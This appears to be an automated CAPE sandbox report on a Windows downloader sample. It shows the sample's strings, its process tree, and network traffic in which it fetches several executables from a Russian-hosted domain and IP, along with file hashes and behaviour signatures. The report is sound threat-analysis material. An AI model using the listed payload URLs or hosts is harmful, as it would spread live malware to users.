ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
Yubokejuni. Kudihube kopukafoloze pi yiwa yayeha. Cubenegi jugudanepi kotigo di muwusocudiwuze. Mikeva sohirova.Tuya. Dolezosiwa yu humunicidu ladipibawe. Sa cavawice wecotuwijaharo rajuco. Zi bubajocejeda macaviye yojelefuwa hokenonohu. Wumipu tedi mabozodeseyile meje vuxotipufiteyi. Yapelitaya. Zukesi. Javobohisabiyo hoxu cojanu kazaha. Vi wexe peniwanegi. Kicudo (
kernel32.dll
KERNEL32.DLL
mscoree.dll
runtime error
@Microsoft Visual C++ Runtime Library
<program name unknown>
Program:
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
April
March
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
ADVAPI32.DLL
WUSER32.DLL
Kesodoxofezavu
VS_VERSION_INFO
StringFileInfo
457aa56b
FileVersion
3.4.6.86
InternalName
mukuge.exe
LegalCopyright
Copyright (C) 2018, vasupejen
ProductVersion
3.4.6.86
VarFileInfo
Translation
This file is not on VirusTotal.

Process Tree


Izu2hJvy.exe, PID: 1900, Parent PID: 2584
Full Path: C:\Users\user\AppData\Local\Temp\Izu2hJvy.exe
Command Line: "C:\Users\user\AppData\Local\Temp\Izu2hJvy.exe"
winsvcs.exe, PID: 3040, Parent PID: 1900
Full Path: C:\Windows\5769805074060605\winsvcs.exe
Command Line: C:\Windows\5769805074060605\winsvcs.exe
3635423912.exe, PID: 840, Parent PID: 3040
Full Path: C:\Users\user\AppData\Local\Temp\3635423912.exe
Command Line: C:\Users\user\AppData\Local\Temp\3635423912.exe
3843231898.exe, PID: 2300, Parent PID: 3040
Full Path: C:\Users\user\AppData\Local\Temp\3843231898.exe
Command Line: C:\Users\user\AppData\Local\Temp\3843231898.exe
2658928598.exe, PID: 2628, Parent PID: 3040
Full Path: C:\Users\user\AppData\Local\Temp\2658928598.exe
Command Line: C:\Users\user\AppData\Local\Temp\2658928598.exe
4089713972.exe, PID: 2416, Parent PID: 3040
Full Path: C:\Users\user\AppData\Local\Temp\4089713972.exe
Command Line: C:\Users\user\AppData\Local\Temp\4089713972.exe
3527325130.exe, PID: 2084, Parent PID: 3040
Full Path: C:\Users\user\AppData\Local\Temp\3527325130.exe
Command Line: C:\Users\user\AppData\Local\Temp\3527325130.exe

Hosts

Direct IP Country Name
N 92.63.197.48 Russian Federation
Y 8.8.8.8 United States

TCP

Source Source Port Destination Destination Port
192.168.35.22 49167 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.22 49168 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.22 49169 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.22 49170 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.22 49173 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.22 49174 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.22 49175 92.63.197.48 slpsrgpsrhojifdij.ru 80

UDP

Source Source Port Destination Destination Port
192.168.35.22 58774 8.8.8.8 53

DNS

Name Response Post-Analysis Lookup
slpsrgpsrhojifdij.ru A 92.63.197.48

HTTP Requests

URI Data
http://slpsrgpsrhojifdij.ru/1.exe
GET /1.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: slpsrgpsrhojifdij.ru

http://slpsrgpsrhojifdij.ru/2.exe
GET /2.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: slpsrgpsrhojifdij.ru

http://slpsrgpsrhojifdij.ru/3.exe
GET /3.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: slpsrgpsrhojifdij.ru

http://slpsrgpsrhojifdij.ru/4.exe
GET /4.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: slpsrgpsrhojifdij.ru

http://slpsrgpsrhojifdij.ru/5.exe
GET /5.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: slpsrgpsrhojifdij.ru

http://92.63.197.48/m/1.exe
GET /m/1.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.48

http://92.63.197.48/m/2.exe
GET /m/2.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.48

http://92.63.197.48/m/3.exe
GET /m/3.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.48

http://92.63.197.48/m/4.exe
GET /m/4.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.48

http://92.63.197.48/m/5.exe
GET /m/5.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.48

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

No JA3 hashes found.

File name winsvcs.exe
Associated Filenames
C:\Windows\5769805074060605\winsvcs.exe
File Size 144384 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 77067974a70af43a3cadf88219d1e28c
SHA1 7aa8fd4d0e0f44a4ed37f8542f7a1b0bc9faa58c
SHA256 4c0103c745fa6e173821035c304863d751bea9c073d19070d9ebf8685da95040
CRC32 9BD949DF
Ssdeep 1536:EJuqJbIXcA+Uli+SR1rJ0Fgc/7rSmOnVO1en5n/bFzhvYCvCY1AbIwLVbV56:yLJbIXjPkSgnzDHFCjbI8V
ClamAV None
Yara None matched
CAPE Yara None matched
File name 3635423912.exe
Associated Filenames
C:\Users\user\AppData\Local\Temp\3635423912.exe
C:\Users\user\AppData\Local\Temp\4089713972.exe
File Size 539648 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 cb9d7ff8deb972b96917e88e0d56adac
SHA1 8ca2b46c42c7b413e9a24bdf2790f9260af0facf
SHA256 c2cb48209e590289e62a2e461ef9b00078b104aa359bdc02b64c695c9eb8cd27
CRC32 2161DC8B
Ssdeep 3072:G7UpE9lqoZ/WLpwsUPg7YSU2RrygKjFvwwwwwwlwwwwww2wwww4ByXrMlseFaEkX:G7V93ZeLpw1eU2RrygKFErMeeF3k
ClamAV None
Yara None matched
CAPE Yara None matched
File name 3843231898.exe
Associated Filenames
C:\Users\user\AppData\Local\Temp\3843231898.exe
C:\Users\user\AppData\Local\Temp\3527325130.exe
File Size 598528 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 e0e5164cf5b19d56f33520cd44875c95
SHA1 220f5a668dde7c6d916b1b9a5dcde82dbc2639f8
SHA256 035ae8f389e0a4cb58428d892123bc3e3b646e4387c641e664c5552228087285
CRC32 F995F0E6
Ssdeep 3072:Do/wytwRh/tBqZZ4qGT0sZLTHR4X+ZGDNKmM50m62LHOrHQjnM5zvyPuD3bMUdWi:DXkwftW4q8LT68mM57BRgT3yH
ClamAV None
Yara None matched
CAPE Yara None matched
File name 2658928598.exe
Associated Filenames
C:\Users\user\AppData\Local\Temp\2658928598.exe
File Size 1209856 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 a14a3a3036a1706408443e28399a15c1
SHA1 6e5cf7cbfddca89f0f8e54b7ba8f169cf6769237
SHA256 b8bf5b607b305139db81c48e96010a67768488b01edc8c615306ed303c545b0d
CRC32 E4E5533F
Ssdeep 24576:35mjsJNJuudqiKKES942zSl3DU0pqsDnRctBfdoJJlp/5LFYgNYpp6A3:35SstuCeS942G9DU0tRkfeJ/FqWYt3
ClamAV None
Yara None matched
CAPE Yara None matched
Sorry! No CAPE files.
Process Name Izu2hJvy.exe
PID 1900
Dump Size 15360 bytes
Module Path C:\Users\user\AppData\Local\Temp\Izu2hJvy.exe
Type PE image: 32-bit executable
MD5 3615bfbcd8f12601076c027baa396376
SHA1 f14a6ac28230078ef0a8c3b94418cac2618f2fa3
SHA256 124593204fa7ee18b23c33a16f2e7f6e1a0001b14abecf9877b63e266296156f
CRC32 ED4FF55F
Ssdeep 192:zyGxgNKpyvjxdvl91Hx40ccE3aadWhcVUP1oynaUTG8tu3gKlaSM:z6ZUdKadWhcV610UTG8k3k
ClamAV None
Yara None matched
CAPE Yara None matched
Dump Filename 124593204fa7ee18b23c33a16f2e7f6e1a0001b14abecf9877b63e266296156f
Process Name winsvcs.exe
PID 3040
Dump Size 15360 bytes
Module Path C:\Windows\5769805074060605\winsvcs.exe
Type PE image: 32-bit executable
MD5 5bc43bf46ff36af5ef0771f9ba09827b
SHA1 111c850f5ab4cc549b94192d62ecac3aa9012c83
SHA256 2985795868cd0d390ffb3f7bab59415d83b78c504635ddea97db5a55474e173e
CRC32 15905483
Ssdeep 192:zyGxgNKpyvjxdvl91Hx40ccE3aadWhcVUP1oynaUTG8tu3NKlaSM:z6ZUdKadWhcV610UTG8k3F
ClamAV None
Yara None matched
CAPE Yara None matched
Dump Filename 2985795868cd0d390ffb3f7bab59415d83b78c504635ddea97db5a55474e173e


Processing ( 121.682 seconds )

  • 116.258 BehaviorAnalysis
  • 1.923 CAPE
  • 1.538 Dropped
  • 0.939 NetworkAnalysis
  • 0.62 Static
  • 0.164 TargetInfo
  • 0.097 ProcDump
  • 0.094 TrID
  • 0.032 Deduplicate
  • 0.01 Strings
  • 0.005 AnalysisInfo
  • 0.001 Debug
  • 0.001 config_decoder

Signatures ( 20.809 seconds )

  • 7.477 api_spamming
  • 5.601 decoy_document
  • 3.347 shifu_behavior
  • 2.742 stealth_timeout
  • 0.42 antivm_generic_disk
  • 0.29 bootkit
  • 0.172 mimics_filetime
  • 0.142 virus
  • 0.135 stealth_file
  • 0.132 reads_self
  • 0.122 hancitor_behavior
  • 0.054 webmail_phish
  • 0.032 secure_login_phish
  • 0.028 generic_phish
  • 0.018 network_document_http
  • 0.015 stealth_network
  • 0.014 wscript_downloader_http
  • 0.01 antiav_detectreg
  • 0.004 persistence_autorun
  • 0.004 antiav_detectfile
  • 0.004 infostealer_ftp
  • 0.004 ransomware_files
  • 0.003 securityxploded_modules
  • 0.003 infostealer_im
  • 0.003 ransomware_extensions
  • 0.002 Doppelganging
  • 0.002 sets_autoconfig_url
  • 0.002 ransomware_message
  • 0.002 antianalysis_detectreg
  • 0.002 modify_proxy
  • 0.002 browser_security
  • 0.002 disables_browser_warn
  • 0.002 infostealer_bitcoin
  • 0.002 infostealer_mail
  • 0.001 tinba_behavior
  • 0.001 malicious_dynamic_function_loading
  • 0.001 disables_spdy
  • 0.001 rat_nanocore
  • 0.001 antiemu_wine_func
  • 0.001 ipc_namedpipe
  • 0.001 dynamic_function_loading
  • 0.001 disables_wfp
  • 0.001 cerber_behavior
  • 0.001 kovter_behavior
  • 0.001 antianalysis_detectfile
  • 0.001 antivm_vbox_files
  • 0.001 antivm_vbox_keys
  • 0.001 geodo_banking_trojan
  • 0.001 network_torgateway

Reporting ( 0.014 seconds )

  • 0.012 SubmitCAPE
  • 0.002 CompressResults
Task ID 29485
Mongo ID 5c36bddcf28488708c4559d8
Cuckoo release 1.3-CAPE